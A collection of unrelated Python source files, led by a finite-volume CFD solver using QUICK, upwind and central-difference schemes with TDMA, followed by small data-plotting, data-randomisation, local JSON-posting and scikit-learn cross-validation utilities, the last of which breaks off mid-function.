    Fi two cells to the north of (j, i) (QUICK stencil).  Returns Fi0N
    when the NN node is the boundary (j == Ny-2) and 0 when it would fall
    outside the domain (j == Ny-1).
    '''
    if j == self.Ny - 1:
        return 0
    if j == self.Ny - 2:
        return self.Fi0N
    return self.Fi[j + 2, i]
def calculate_C(self, j, i, aW, FiW, aE, FiE, Su, p , var):
    '''
    Right-hand-side ("free") term of the TDMA system for cell (j, i):
    the W/E neighbour contributions, the pressure-gradient force for the
    momentum component being solved ("u" or "v"), and the source Su.
    Returns None for any other var value.
    '''
    neighbours = aW[j, i] * FiW(j, i) + aE[j, i] * FiE(j, i)
    if var == "u":
        #u momentum: pressure difference across the W/E faces
        return neighbours + (self.simple.pw(p, j, i) - self.simple.pe(p, j, i)) * self.A[self.E] + Su
    elif var == "v":
        #v momentum: pressure difference across the S/N faces
        return neighbours + (self.simple.ps(p, j, i) - self.simple.pn(p, j, i)) * self.A[self.N] + Su
def calculateTDMACoefficients(self, i):
    '''
    book pag 220
    Apply TDMA S to N sweeping W to E
    Build the tri-diagonal system for the vertical line (column) i:
    alp/bet hold the N/S link coefficients (super/sub diagonal), D the
    central coefficient, and C the right-hand side.
    In the book they have it reversed "j" is for lines and "i" for columns
    '''
    #calculate on each vertical from S -> N
    for j in range(0, self.Ny):
        #Compute the TDMA coefficients
        self.alp[j] = self.aN[j, i].copy()
        self.bet[j] = self.aS[j, i].copy()
        self.D[j] = self.aP[j, i].copy()
        #the free term
        #Avoid problems at boundaries by calling a function which considers the boundary limitation on index
        #boundary conditions are set through the term C[j]
        #the second-neighbour (WW/EE/NN/SS) terms only contribute for the
        #QUICK scheme, where the a?? coefficient arrays are non-zero
        Su = self.SuW[j, i] + self.SuE[j, i] + self.SuS[j, i] + self.SuN[j, i]\
            + self.aWW[j, i] * self.FiWW(j, i) + self.aEE[j, i] * self.FiEE(j, i) + self.aNN[j, i] * self.FiNN(j, i) + self.aSS[j, i] * self.FiSS(j, i)
        #self.C[j] = self.aW[j, i] * self.FiW(j, i) + self.aE[j, i] * self.FiE(j, i) + (self.pE(j,i) - self.pE(j,i)) + Su
        self.C[j] = self.calculate_C(j, i, self.aW, self.FiW, self.aE, self.FiE, Su, self.p, self.var)
    #end for j
#end calculateTDMACoefficients
def calculateQUICKSources(self):
    '''
    Boundary-condition source terms for the QUICK scheme, split per face:
    Su* holds the constant part and Sp* the Fi-linear part of the
    linearised source; interior cells get zeros.  Cells one row/column
    in from the W/S boundary receive the extra mirror-node correction of
    the QUICK stencil.
    '''
    for j in range(0, self.Ny):
        for i in range(0, self.Nx):
            #self.calculate_alpha(j, i)
            #west
            if i == 0:
                #cof = (8.0 / 3 * self.Df[self.W] + 2.0 / 8 * self.F[self.E, j, i] + self.F[self.W, j, i])
                cof = (8.0 / 3 * self.D0W + 2.0 / 8 * self.F[self.E, j, i] + self.F[self.W, j, i])
                self.SuW[j, i] = cof * self.Fi0W
                self.SpW[j, i] = -cof
            elif i == 1 :
                cof = 1.0 / 4 * self.F[self.W, j, i]
                self.SuW[j, i] = -cof * self.Fi0W
                self.SpW[j, i] = cof
            else:
                self.SuW[j, i] = 0
                self.SpW[j, i] = 0
            #east
            if i == self.Nx - 1:
                cof = (8.0 / 3 * self.D0E - self.F[self.E, j, i])
                self.SuE[j, i] = cof * self.Fi0E
                self.SpE[j, i] = -cof
            else:
                self.SuE[j, i] = 0
                self.SpE[j, i] = 0
            #south
            if j == 0:
                #NOTE(review): the analogous west branch combines the
                #opposite-face flux (2/8 * F[E]) with the own-face flux
                #F[W]; here F[S] appears twice, so the 2.0/8 term should
                #presumably use F[N].  Confirm against the QUICK boundary
                #treatment before changing.
                cof = (8.0 / 3 * self.D0S + 2.0 / 8 * self.F[self.S, j, i] + self.F[self.S, j, i])
                self.SuS[j, i] = cof * self.Fi0S
                self.SpS[j, i] = -cof
            elif j == 1:
                cof = 1.0 / 4 * self.F[self.S, j, i]
                self.SuS[j, i] = -cof * self.Fi0S
                self.SpS[j, i] = cof
            else:
                self.SuS[j, i] = 0
                self.SpS[j, i] = 0
            #north
            if j == self.Ny - 1:
                cof = (8.0 / 3 * self.D0N - self.F[self.N, j, i])
                self.SuN[j, i] = cof * self.Fi0N
                self.SpN[j, i] = -cof
            else:
                self.SuN[j, i] = 0
                self.SpN[j, i] = 0
    #end j
    if self.debug == True:
        if self.Nx == 1:
            print "Su:", self.SuS + self.SuN
            print "Sp:", self.SpS + self.SpN
        else:
            print "Su:", self.SuE + self.SuW + self.SuS + self.SuN
            print "Sp:", self.SpE + self.SpW + self.SpS + self.SpN
#end calculateStandardSources
def calculateCDSources(self):
    '''
    Boundary-condition source terms for the central-differencing (CD)
    scheme, split per face: Su* holds the constant part (boundary value
    times the boundary-link coefficient) and Sp* the Fi-linear part;
    both are zero for interior cells.

    Bug fix: the south branch originally computed
    SpS = -(D0E + F[S]) while SuS used D0S, so Su and Sp were
    inconsistent whenever D0E != D0S.  Both now use D0S.
    '''
    for j in range(0, self.Ny):
        for i in range(0, self.Nx):
            #west boundary: boundary diffusion plus incoming convection
            if i == 0:
                cof = self.D0W + self.F[self.W, j, i]
                self.SuW[j, i] = cof * self.Fi0W
                self.SpW[j, i] = -cof
            else:
                self.SuW[j, i] = 0
                self.SpW[j, i] = 0
            #east boundary: boundary diffusion minus outgoing convection
            if i == self.Nx - 1:
                cof = self.D0E - self.F[self.E, j, i]
                self.SuE[j, i] = cof * self.Fi0E
                self.SpE[j, i] = -cof
            else:
                self.SuE[j, i] = 0
                self.SpE[j, i] = 0
            #north boundary
            if j == self.Ny - 1:
                cof = self.D0N - self.F[self.N, j, i]
                self.SuN[j, i] = cof * self.Fi0N
                self.SpN[j, i] = -cof
            else:
                self.SuN[j, i] = 0
                self.SpN[j, i] = 0
            #south boundary (fixed: was -(D0E + F[S]) in SpS)
            if j == 0:
                cof = self.D0S + self.F[self.S, j, i]
                self.SuS[j, i] = cof * self.Fi0S
                self.SpS[j, i] = -cof
            else:
                self.SuS[j, i] = 0
                self.SpS[j, i] = 0
    #end j
    if self.debug == True:
        #%-formatting yields identical output under Python 2 and 3
        print("Su: %s" % (self.SuE + self.SuW + self.SuS + self.SuN))
        print("Sp: %s" % (self.SpE + self.SpW + self.SpS + self.SpN))
#end calculateCDSources
def calculateUDSources(self):
    '''
    Boundary-condition source terms for the upwind-differencing (UD)
    scheme: Su* holds the constant contribution of the boundary value,
    Sp* its Fi-linear counterpart; zero for interior cells.  The inflow
    faces (W/S) include the convective flux, the outflow faces (E/N) only
    the boundary diffusion conductance D0*.
    '''
    for j in range(0, self.Ny):
        for i in range(0, self.Nx):
            #west
            if i == 0:
                #self.SuW[j, i] = (2 * self.Df[self.W] + self.F[self.W, j, i]) * self.Fi0W
                #self.SpW[j, i] = -(2 * self.Df[self.W] + self.F[self.W, j, i])
                cof = (self.D0W + self.F[self.W, j, i])
                self.SuW[j, i] = cof * self.Fi0W
                self.SpW[j, i] = -cof
            else:
                self.SuW[j, i] = 0
                self.SpW[j, i] = 0
            #east
            if i == self.Nx - 1:
                cof = self.D0E
                self.SuE[j, i] = cof * self.Fi0E
                self.SpE[j, i] = -cof
                #self.SuE[j, i] = 2 * self.Df[self.E] * self.Fi0E
                #self.SpE[j, i] = -2 * self.Df[self.E]
            else:
                self.SuE[j, i] = 0
                self.SpE[j, i] = 0
            #north
            if j == self.Ny - 1:
                #self.SuN[j, i] = 2 * self.Df[self.N] * self.Fi0N
                #self.SpN[j, i] = -2 * self.Df[self.N]
                cof = self.D0N
                self.SuN[j, i] = cof * self.Fi0N
                self.SpN[j, i] = -cof
            else:
                self.SuN[j, i] = 0
                self.SpN[j, i] = 0
            #south
            if j == 0:
                #self.SuS[j, i] = (2 * self.Df[self.S] + self.F[self.S, j, i]) * self.Fi0S
                #self.SpS[j, i] = -(2 * self.Df[self.S] + self.F[self.S, j, i])
                cof = self.D0S + self.F[self.S, j, i]
                self.SuS[j, i] = cof * self.Fi0S
                self.SpS[j, i] = -cof
            else:
                self.SuS[j, i] = 0
                self.SpS[j, i] = 0
    #end j
    if self.debug == True:
        print "Su:", self.SuE + self.SuW + self.SuS + self.SuN
        print "Sp:", self.SpE + self.SpW + self.SpS + self.SpN
#end calculateuDSources
def calculate_aP(self, scheme, Sp, fE, fW, fN, fS, aE, aW, aN, aS, aEE = 0, aWW = 0, aNN = 0, aSS = 0):
    '''
    Central coefficient aP of the discretised equation: sum of the
    neighbour link coefficients plus the net convective imbalance minus
    the linearised source Sp.  The QUICK scheme also folds in the
    second-neighbour coefficients.  Returns None for an unknown scheme
    (callers validate the scheme name beforehand).
    '''
    base = aW + aE + aS + aN + (fE - fW) + (fN - fS) - Sp
    if scheme == 'QUICK':
        return base + aSS + aNN + aWW + aEE
    if scheme in ('UD', 'CD'):
        return base
#end calculate_aP
def calculateQUICKCoefficients(self):
    '''
    2D "a" coeficients for QUICK are implementation at page 163 in the Versteeg book
    Link coefficients for the QUICK scheme: besides the immediate
    neighbours (aW/aE/aS/aN), the stencil uses second neighbours
    (aWW/aEE/aSS/aNN); rows/columns adjacent to each boundary are
    special-cased.  The Alpha_* flags pick the upwind branch per face.
    '''
    self.calculateQUICKSources()
    for j in range(0, self.Ny):
        for i in range(0, self.Nx) :
            self.calculate_alpha(j, i)
            #aW
            if i == 0:
                self.aW[j, i] = 0
            elif i == 1:
                self.aW[j, i] = self.Df[self.W] + 7.0 / 8 * self.F[self.W, j, i] + 1.0 / 8 * self.F[self.E, j, i]
            elif i == self.Nx - 1:
                self.aW[j, i] = self.Df[self.W] + 1.0 / 3 * self.D0E + 6.0 / 8 * self.F[self.W, j, i]
            else:
                self.aW[j, i] = self.Df[self.W] + 6.0 / 8 * self.Alpha_w * self.F[self.W, j, i] + 1.0 / 8 * self.Alpha_e * self.F[self.E, j, i]\
                    + 3.0 / 8 * (1 - self.Alpha_w) * self.F[self.W, j, i]
            #aE
            if i == 0 :
                self.aE[j, i] = self.Df[self.E] + 1.0 / 3 * self.D0W - 3.0 / 8 * self.F[self.E, j, i]
            elif i == 1:
                self.aE[j, i] = self.Df[self.E] - 3.0 / 8 * self.Alpha_e * self.F[self.E, j, i]
            elif i == self.Nx - 1:
                self.aE[j, i] = 0
            else:
                self.aE[j, i] = self.Df[self.E] - 3.0 / 8 * self.Alpha_e * self.F[self.E, j, i] - 6.0 / 8 * (1 - self.Alpha_e) * self.F[self.E, j, i]\
                    - 1.0 / 8 * (1 - self.Alpha_w) * self.F[self.W, j, i]
            #aWW (second neighbour west; zero near the boundary)
            if i == 0:
                self.aWW[j, i] = 0
            elif i == 1:
                self.aWW[j, i] = 0
            else:
                self.aWW[j, i] = -1.0 / 8 * self.Alpha_w * self.F[self.W, j, i]
            #aEE (second neighbour east)
            if i == self.Nx - 1 or i == self.Nx - 2:
                self.aEE[j, i] = 0
            else:
                self.aEE[j, i] = 1.0 / 8 * (1 - self.Alpha_e) * self.F[self.E, j, i]
            #aS
            if j == 0:
                self.aS[j, i] = 0
            elif j == 1:
                self.aS[j, i] = self.Df[self.S] + 7.0 / 8 * self.F[self.S, j, i] + 1.0 / 8 * self.F[self.N, j, i]
            elif j == self.Ny - 1:
                self.aS[j, i] = self.Df[self.S] + 1.0 / 3 * self.D0N + 6.0 / 8 * self.F[self.S, j, i]
            else:
                self.aS[j, i] = self.Df[self.S] + 6.0 / 8 * self.Alpha_s * self.F[self.S, j, i] + 1.0 / 8 * self.Alpha_n * self.F[self.N, j, i] + 3.0 / 8 * (1 - self.Alpha_s) * self.F[self.S, j, i]
            #aN
            if j == 0 :
                self.aN[j, i] = self.Df[self.N] + 1.0 / 3 * self.D0S - 3.0 / 8 * self.F[self.N, j, i]
            elif j == 1:
                self.aN[j, i] = self.Df[self.N] - 3.0 / 8 * self.Alpha_n * self.F[self.N, j, i]
            elif j == self.Ny - 1:
                self.aN[j, i] = 0
            else:
                self.aN[j, i] = self.Df[self.N] - 3.0 / 8 * self.Alpha_n * self.F[self.N, j, i] - 6.0 / 8 * (1 - self.Alpha_n) * self.F[self.N, j, i] - 1.0 / 8 * (1 - self.Alpha_s) * self.F[self.S, j, i]
            #aSS (second neighbour south)
            if j == 0:
                self.aSS[j, i] = 0
            elif j == 1:
                self.aSS[j, i] = 0
            else:
                self.aSS[j, i] = -1.0 / 8 * self.Alpha_s * self.F[self.S, j, i]
            #aNN (second neighbour north)
            if j == self.Ny - 1 or j == self.Ny - 2:
                self.aNN[j, i] = 0
            else:
                self.aNN[j, i] = 1.0 / 8 * (1 - self.Alpha_n) * self.F[self.N, j, i]
            #central coefficient from all links, the convective imbalance and Sp
            Sp = self.SpE[j, i] + self.SpW[j, i] + self.SpS[j, i] + self.SpN[j, i]
            #self.aP[j, i] = self.aW[j, i] + self.aE[j, i] + self.aS[j, i] + self.aN[j, i] + self.aSS[j, i] + self.aNN[j, i] + self.aWW[j, i] + self.aEE[j, i]\
            # + (self.F[self.E] - self.F[self.W]) + (self.F[self.N] - self.F[self.S]) - Sp
            self.aP[j, i] = self.calculate_aP('QUICK', Sp, \
                self.F[self.E, j, i], self.F[self.W, j, i], self.F[self.N, j, i], self.F[self.S, j, i], \
                self.aE[j, i], self.aW[j, i], self.aN[j, i], self.aS[j, i], \
                self.aEE[j, i], self.aWW[j, i], self.aNN[j, i], self.aSS[j, i])
            #TVD deferred correction source term
        #end i
    #end j
#end calculateStandardOUICKcoefficients
def calculateUDCoefficients(self):
    '''
    Matrix coefficients for the upwind-differencing (UD) scheme.  Each
    link coefficient combines the face diffusion conductance Df with the
    upwinded convective flux (max(F, 0) keeps only flow entering the
    cell); boundary-adjacent links are cut to 0 because the boundary
    influence enters through the Su/Sp sources from calculateUDSources().
    Cleanup: removed the stray "+ +" (duplicate unary plus) in the aS
    branch -- no behaviour change.
    '''
    self.calculateUDSources()
    for j in range(0, self.Ny):
        for i in range(0, self.Nx):
            #west link
            if i == 0:
                self.aW[j, i] = 0
            else:
                self.aW[j, i] = self.Df[self.W] + max(self.F[self.W, j, i], 0)
            #east link
            if i == self.Nx - 1:
                self.aE[j, i] = 0
            else:
                self.aE[j, i] = self.Df[self.E] + max(0, -self.F[self.E, j, i])
            #north link
            if j == self.Ny - 1:
                self.aN[j, i] = 0
            else:
                self.aN[j, i] = self.Df[self.N] + max(0, -self.F[self.N, j, i])
            #south link
            if j == 0:
                self.aS[j, i] = 0
            else:
                self.aS[j, i] = self.Df[self.S] + max(self.F[self.S, j, i], 0)
            #central coefficient from the links, convective imbalance and sources
            Sp = self.SpW[j, i] + self.SpE[j, i] + self.SpS[j, i] + self.SpN[j, i]
            self.aP[j, i] = self.calculate_aP('UD', Sp, \
                self.F[self.E, j, i], self.F[self.W, j, i], self.F[self.N, j, i], self.F[self.S, j, i], \
                self.aE[j, i], self.aW[j, i], self.aN[j, i], self.aS[j, i])
    #END for i
#end calculateUDCoefficients
def calculateCDCoefficients(self):
    '''
    Matrix coefficients for the central-differencing (CD) scheme: each
    link mixes the face diffusion conductance Df with half the convective
    flux through that face.  Links pointing at a boundary are zeroed --
    the boundary influence is carried by the Su/Sp sources computed by
    calculateCDSources().
    '''
    self.calculateCDSources()
    for j in range(0, self.Ny):
        for i in range(0, self.Nx):
            at_west = (i == 0)
            at_east = (i == self.Nx - 1)
            at_south = (j == 0)
            at_north = (j == self.Ny - 1)
            self.aW[j, i] = 0 if at_west else self.Df[self.W] + self.F[self.W, j, i] / 2
            self.aE[j, i] = 0 if at_east else self.Df[self.E] - self.F[self.E, j, i] / 2
            self.aN[j, i] = 0 if at_north else self.Df[self.N] - self.F[self.N, j, i] / 2
            self.aS[j, i] = 0 if at_south else self.Df[self.S] + self.F[self.S, j, i] / 2
            #central coefficient
            Sp = self.SpW[j, i] + self.SpE[j, i] + self.SpS[j, i] + self.SpN[j, i]
            self.aP[j, i] = self.calculate_aP('CD', Sp, \
                self.F[self.E, j, i], self.F[self.W, j, i], self.F[self.N, j, i], self.F[self.S, j, i], \
                self.aE[j, i], self.aW[j, i], self.aN[j, i], self.aS[j, i])
    #END for i
#end calculateCDCoefficients
def callSolver(self):
    '''
    Iterative driver: compute the scheme's coefficients once (they do not
    depend on Fi), then sweep the columns W to E, solving each vertical
    line with TDMA, until the change between outer iterations drops below
    EPSILON or maxiter is exceeded.
    '''
    #solve with TDMA for this i vertical line S-N
    n = self.D.size
    Iter = 0
    #does not depend on Fi so we take it our of the iteration process
    if self.scheme == "QUICK":
        self.calculateQUICKCoefficients()
    elif self.scheme == "CD":
        self.calculateCDCoefficients()
    elif self.scheme == "UD":
        self.calculateUDCoefficients()
    else:
        print "Unknown Scheme!!!"
        return
    #Because we don't know the values of Fi in the middle the first calculation will be far off
    #Therefore we set an iterative cycle to calculate the values of Fi
    if self.simple.lc.CPP == True:
        #reusable solution buffer for the C++ TDMA backend
        x = numpy.zeros(n)
    while self.maxiter > Iter :
        #Swipe from W to E
        for i in range(0, self.Nx):
            #calculate the TDMA coefficients for column i
            self.calculateTDMACoefficients(i)
            if self.debug == True:
                print "beta:", self.bet
                print "D", self.D
                print "alp", self.alp
                print "C", self.C
            if self.simple.lc.CPP == True:
                #C++ TDMA backend
                self.cls.setTDMA(-self.bet[1:], self.D, -self.alp[:-1], self.C, n)
                d = self.cls.solveTDMA(x, n)
                self.Fi[:, i] = d["solution"].copy()
            else :
                #pure-Python Thomas algorithm
                x = thomas(n, -self.bet[1:], self.D, -self.alp[:-1], self.C)
                self.Fi[:, i] = x.copy()
        #end i
        #TODO Under relaxation
        #blend the new sweep with the previous field (under-relaxation factor urf)
        self.Fi = self.urf * self.Fi.copy() + self.FiOld.copy() * (1 - self.urf)
        #test accuracy and exit condition
        #convergence is measured on a single representative column
        if self.Nx == 1:
            flat = self.Fi[:, 0] - self.FiOld[:, 0]
        else:
            flat = self.Fi[:, 1] - self.FiOld[:, 1]
        dx = math.sqrt(numpy.dot(flat, flat))
        if Iter % 600 == 0:
            print "var: %s iter # %d, dx=%1.9f" % (self.var, Iter, dx)
            #print "Fi:", self.Fi
        #Exit if we are satisfied wit the accuracy
        if dx < self.EPSILON :
            return
        Iter += 1
        #copy current values to the old values matrix
        self.FiOld = self.Fi.copy()
        #if we did not converge yet print an error and exit
        if self.maxiter < Iter:
            print "Max iterations exceeded => did not converge"
            return
    #end while
#end callQUICK
def plotFi(self):
    '''
    Visualise the solution field Fi: a simple line plot for 1D problems
    (Nx == 1), otherwise a heatmap with superimposed contours plus a
    second contour-only figure.  Blocks on plt.show().
    '''
    fig = plt.figure(1, facecolor = 'w', edgecolor = 'k') #prepare the plotting environment
    ax = fig.add_subplot(111)
    if self.Nx == 1:
        y = numpy.arange(0., self.Ly, self.deltaY)
        ax.plot(y, self.Fi[:, 0])
    else:
        #create the figure and axes object
        # Creating the grid of coordinates x,y
        x = numpy.arange(0., self.Lx, self.deltaX) #create the x, and y divisions
        y = numpy.arange(0., self.Ly, self.deltaY)
        X, Y = numpy.meshgrid(x, y) #create the grid
        #plot a heatmap
        im = ax.pcolor(X, Y, self.Fi) # draw the heatmap
        fig.colorbar(im) # add the legend on a colour bar
        #superimpose contours
        cs = ax.contour(X, Y, self.Fi) # draw the contour
        plt.clabel(cs, inline = 1, fontsize = 10) # draw the contour
        #draw only the contours
        fig2 = plt.figure(2, facecolor = 'w', edgecolor = 'k')
        ax2 = fig2.add_subplot(111)
        cs = ax2.contour(X, Y, self.Fi) # draw the contour
        plt.clabel(cs, inline = 1, fontsize = 10) # create the label on the contour
    #end if
    plt.show()
#end plotFi
def solve(self):
    '''
    Top-level entry point: apply the Dirichlet boundary values, run the
    iterative TDMA solver, then print and return the converged field Fi.
    '''
    #We know E,W, N, S boundary conditions, so lets speed up things
    self.setBoundaryConditions()
    #call the main algorithm
    self.callSolver()
    #print the solution vector
    print self.Fi
    return self.Fi
#end solve
#end class
|
import csv
import numpy
import matplotlib.pyplot as plt
def plot_all_bars(ranks, acceptance_rates, exported_figure_filename, xlim=(0, 250)):
    """Save a bar chart of acceptance rate per college rank.

    ranks -- sequence of college ranks (used only for the number of bars)
    acceptance_rates -- one bar height per rank
    exported_figure_filename -- path the figure is written to
    xlim -- x-axis limits; defaults to the previously hard-coded (0, 250)
    """
    fig = plt.figure()
    ax = fig.add_subplot(1, 1, 1)
    X = numpy.arange(len(ranks))
    width = 0.25
    ax.bar(X + width, acceptance_rates, width)
    ax.set_xlim(list(xlim))
    fig.savefig(exported_figure_filename)
#column names and numpy dtypes for the CSV ('a200' = 200-byte fixed string)
fieldNames = ['name', 'rank', 'acceptance']
dataTypes = [('name', 'a200'), ('rank','i'), ('acceptance', 'i')]
# Load data from csv into numpy
# (invalid_raise=False silently drops malformed rows)
college_data = numpy.genfromtxt('college_data.csv', delimiter=',', skip_header=1,
                                names=fieldNames, invalid_raise=False,
                                dtype=dataTypes)
#plot acceptance rate per rank and export the chart to disk
plot_all_bars(college_data['rank'], college_data['acceptance'], 'chart_college_data.png')
|
#!/usr/bin/env python
import math
from random import choice, randint, sample, random
def random_judgement(old_judgement):
    """Return a uniformly random judgement on the 1..7 scale; the previous
    judgement is ignored (the parameter exists for rfunc-callback compatibility)."""
    return randint(1, 7)
def random_judgement_offset(old_judgement, d=3):
    """Shift a 1..7 judgement by +/-d (sign chosen at random with equal
    probability), wrapping around on the 1..7 scale."""
    offset = -d if random() <= 0.5 else d
    return (old_judgement + offset - 1) % 7 + 1
def randomize_values(data, p, rfunc=random_judgement):
    """Return a copy of *data* where each non-string cell is replaced by
    rfunc(value) with probability p; string cells are always kept.

    Bug fix: the original used the `cond and x or rfunc(x)` idiom, which
    wrongly falls through to rfunc(x) whenever x itself is falsy (0,
    empty string, ...) even though the condition held.  A real
    conditional expression keeps such values intact.  random() is still
    only drawn for non-string cells, as before.
    """
    assert 0 <= p <= 1
    data = data.copy()
    isstr = lambda x: isinstance(x, str)
    replf = lambda x: x if (isstr(x) or random() > p) else rfunc(x)
    return data.applymap(replf)
def randomize_offsets(data, p):
    """Randomize judgements with probability p, replacing each affected value
    with a wrapped +/-3 offset of the original (see random_judgement_offset)."""
    return randomize_values(data, p, random_judgement_offset)
def blank_values(data, p):
    """Return a copy of *data* where each non-string cell is blanked to NaN
    with probability p; string cells are always kept.

    Bug fix: the original `cond and x or nan` idiom also blanked any
    falsy value (0, empty string) unconditionally; a real conditional
    expression keeps them.
    """
    assert 0 <= p <= 1
    isstr = lambda x: isinstance(x, str)
    r = lambda x: x if (isstr(x) or random() > p) else float('nan')
    retval = data.applymap(r)
    return retval
def add_subjects(data, n, rfunc=random_judgement):
    """Return a copy of *data* with n fake judge columns ('fakecol_0'..)
    appended; each fake column is built by mapping rfunc over the index.

    Fix: replaced the Python-2-only `xrange` with `range` -- identical
    iteration on both interpreters.
    """
    data = data.copy()
    for i in range(n):
        data['fakecol_%d' % i] = data.index.map(lambda x: rfunc(x))
    return data
def replace_subjects(data, n, rfunc=random_judgement):
    """Return a copy of *data* in which the judgements of n randomly chosen
    subject columns (all columns after the first two) are regenerated
    value-by-value via rfunc."""
    judgement_columns = data.columns[2:]
    assert n <= len(judgement_columns)
    chosen = sample(judgement_columns, n)
    replaced = data.copy()
    for column in chosen:
        replaced[column] = replaced[column].map(lambda x: rfunc(x))
    return replaced
def replace_percent_subjects(data, p, rfunc=random_judgement):
    """Regenerate judgements for a fraction *p* of the subject columns
    (rounded up) via replace_subjects.

    Bug fix: the original read data.columns[2] (a single column label)
    instead of data.columns[2:], so len() counted the characters of one
    column name rather than the number of judgement columns.
    """
    judgement_columns = data.columns[2:]
    n = int(math.ceil(p * len(judgement_columns)))
    return replace_subjects(data, n, rfunc)
def blank_subjects(data, n):
    """Return a copy of *data* with n randomly chosen subject columns
    (columns after the first two) blanked entirely to NaN; the input
    frame is left untouched."""
    judgement_columns = data.columns[2:]
    chosen = sample(judgement_columns, n)
    blanked = data.copy()
    for column in chosen:
        blanked[column] = float('nan')
    return blanked
|
import argparse
import os
import json
from utils import send_json_post
#local dev server endpoint (was a pointless f-string with no placeholders)
_APP_URL = "http://127.0.0.1:5000/led"
""" Example usage
python send_saved_json_to_app.py --filename=red_check
"""
if __name__ == "__main__":
    #load a saved JSON payload from data/<filename>.json and POST it to the app
    parser = argparse.ArgumentParser()
    parser.add_argument("--filename", required=True, type=str)
    args = parser.parse_args()
    filepath = os.path.join("data/", args.filename + ".json")
    assert os.path.isfile(filepath), f"filepath '{filepath}' does not exist"
    with open(filepath, "r") as f:
        data = json.load(f)
    send_json_post(_APP_URL, data, verbose=True)
|
class ExportModelBase:
    '''
    Base class for export backends.  classifyUserData is a shared helper;
    exportLogs and exportStatistics must be overridden by subclasses.
    (Docstrings translated from Spanish.)
    '''
    @classmethod
    def classifyUserData(cls, usersData):
        '''Index the given user objects by their id for O(1) lookup.'''
        return {user.id: user for user in usersData}
    @classmethod
    def exportLogs(cls, ownerId, logs, usersData):
        '''Export raw logs; abstract hook.'''
        #NotImplementedError is the idiomatic marker for an abstract hook;
        #it subclasses Exception, so existing `except Exception` callers
        #still catch it
        raise NotImplementedError('not implemented')
    @classmethod
    def exportStatistics(cls, ownerId, stats, usersData):
        '''Export aggregate statistics; abstract hook.'''
        raise NotImplementedError('not implemented')
|
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns # for beautiful plots
from scipy import stats
import math
# plotly系-----------
import plotly.offline as py
py.init_notebook_mode(connected=True)
from plotly.offline import init_notebook_mode, iplot
init_notebook_mode(connected=True)
import plotly.graph_objs as go
import plotly.offline as offline
offline.init_notebook_mode()
#--------------------------------
def predict_cv(model, train_x, train_y, test_x):
    """Run 4-fold cross-validation with *model*.

    Returns a tuple of (out-of-fold predictions for train_x restored to
    the original row order, fold-averaged predictions for test_x, the
    model as fitted on the final fold).  Per-fold and overall RMSE are
    printed.  (Comments translated from Japanese.)
    """
    preds = []
    preds_test = []
    va_indexes = []
    kf = KFold(n_splits=4, shuffle=True, random_state=6785)
    # train and predict per fold, keeping each fold's predictions and row indices
    for i, (tr_idx, va_idx) in enumerate(kf.split(train_x)):
        tr_x, va_x = train_x.iloc[tr_idx], train_x.iloc[va_idx]
        tr_y, va_y = train_y.iloc[tr_idx], train_y.iloc[va_idx]
        model.fit(tr_x, tr_y)
        tr_pred = model.predict(tr_x)
        pred = model.predict(va_x)
        preds.append(pred)
        pred_test = model.predict(test_x)
        preds_test.append(pred_test)
        va_indexes.append(va_idx)
        print(' score Train : {:.6f}' .format(np.sqrt(mean_squared_error(tr_y, tr_pred))),
              ' score Valid : {:.6f}' .format(np.sqrt(mean_squared_error(va_y, pred))))
    # concatenate the out-of-fold predictions, then restore the original row order
    va_indexes = np.concatenate(va_indexes)
    preds = np.concatenate(preds, axis=0)
    order = np.argsort(va_indexes)
    pred_train = pd.DataFrame(preds[order])
    # average the test-set predictions over the folds
    preds_test = pd.DataFrame(np.mean(preds_test, axis=0))
    print('Score : {:.6f}' .format(np.sqrt(mean_squared_error(train_y, pred_train))))
    return pred_train, preds_test, model
def missing_check(data,head_count=5):
    """Summarise missing values per column of *data*.

    Returns a DataFrame indexed by column and sorted by missingness, with
    'Total' (count of NaNs) and 'Percent' (NaN fraction) columns; also
    prints how many columns contain at least one missing value.
    NOTE(review): head_count is accepted but never used -- kept only for
    interface compatibility.
    """
    null_counts = data.isnull().sum().sort_values(ascending=False)
    null_fractions = (data.isnull().sum() / data.isnull().count()).sort_values(ascending=False)
    summary = pd.concat([null_counts, null_fractions], axis=1, keys=['Total', 'Percent'])
    print('Number of missing columns:', len(summary[summary['Percent'] > 0]))
    return summary
def object_countplot(data, add_cols,col_num=3,label_vertical=True):
    """Bar-plot the per-label counts of every object-dtype column in *data*
    (plus any extra columns in add_cols) on a subplot grid.

    col_num -- number of subplot columns
    label_vertical -- rotate the x tick labels 90 degrees when True
    (Comments translated from Japanese.)
    """
    data_object_columns = data.select_dtypes('object').columns
    obj_cols = list(data_object_columns)
    obj_cols = obj_cols + add_cols
    nr_rows = math.ceil(len(obj_cols)/col_num)
    nr_cols = col_num
    #taller subplots are needed when the labels are rotated vertically
    subplot_ratio = [4,3]
    if label_vertical:
        subplot_ratio = [4,5]
    fig, axs = plt.subplots(nr_rows, nr_cols, figsize=(nr_cols*subplot_ratio[0],nr_rows*subplot_ratio[1]))
    for r in range(0,nr_rows):
        for c in range(0,nr_cols):
            i = r*nr_cols+c
            if i < len(obj_cols):
                g = sns.countplot(x=obj_cols[i], data=data, ax = axs[r][c])
                if label_vertical:
                    a = data[obj_cols[i]].value_counts().index
                    g.set_xticklabels(a, rotation=90)
    plt.tight_layout()
    plt.show()
def object_label(var_name,tar_name, data):
    """For each category of *var_name*, compute the share of rows whose
    binary target *tar_name* equals 1, bar-plot the shares sorted
    descending, and return a DataFrame with columns
    ['tar_per', 'count', 'tar1_count'].
    (Comments translated from Japanese.)"""
    #per-category totals and per-category counts of target == 1
    zentai = data[var_name].value_counts()
    target_1 = data[data[tar_name]==1][var_name].value_counts()
    per = target_1/zentai
    per = per.sort_values(ascending=False)
    #plot the shares
    labels = list(per.index)
    x = np.arange(len(labels))
    width = 0.35
    fig, ax = plt.subplots()
    rect = ax.bar(x, per, width)
    ax.set_xticks(x)
    ax.set_xticklabels(labels,rotation=-90)
    plt.show()
    #assemble the summary DataFrame and return it
    df = pd.concat([per,zentai,target_1],axis=1)
    df.columns = ['tar_per','count','tar1_count']
    return df
def iplt_countplot(var_name,tar_name,data):
    """Interactive (plotly) breakdown of the binary target *tar_name*
    within each category of *var_name*, shown as percentage YES/NO bars.
    (Comments translated from Japanese.)"""
    temp = data[var_name].value_counts()
    #print(temp.values)
    #count target == 1 / target == 0 rows per category
